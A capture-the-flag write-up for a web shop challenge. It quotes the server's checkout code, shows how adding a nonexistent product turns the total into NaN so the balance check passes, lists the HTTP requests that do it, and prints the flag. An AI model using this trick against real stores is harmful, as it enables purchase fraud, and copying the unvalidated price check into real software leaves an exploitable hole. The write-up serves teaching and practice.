We dont take any responsibility in any damage that our product may cause to the user’s health
A shop where you can buy various “Za” products. You start with $100 balance, but the flag item “RealZa” costs $1000.
The vulnerability #
Looking at the checkout logic in server.js:
const prices = { "FakeZa": 1, "ElectricZa": 65, "CartoonZa": 35, "RealZa": 1000 };
app.post('/checkout', (req, res) => {
const cart = req.session.cart;
let total = 0;
for (const product in cart) {
total += prices[product] * cart[product];
}
if (total > req.session.balance) {
res.json({ "success": true, "balance": "Insufficient Balance" });
} else {
// Purchase succeeds, items added to inventory
// ...
}
});The problem: the cart can contain any product name, not just valid ones. If product doesn’t exist in prices:
prices["RealZa"] * 1 // 1000
prices["anything"] * 1 // undefined * 1 = NaN
1000 + NaN // NaN
NaN > 100 // false
Since NaN > 100 is false, the balance check passes.
Exploit #
Using Burp Suite:
-
Login - POST to
/loginwith any username/password -
Add RealZa to cart - POST to
/add-cart:{"product":"RealZa","quantity":1} -
Add a fake product - POST to
/add-cart:{"product":"anything","quantity":1} -
Checkout - POST to
/checkout -
Get flag - Visit
/inventory
The fake product causes prices["anything"] to be undefined, making the total NaN. The check NaN > 100 returns false, so checkout succeeds despite not having enough balance.
Flag #
pascalCTF{w3_l1v3_f0r_th3_z4z4}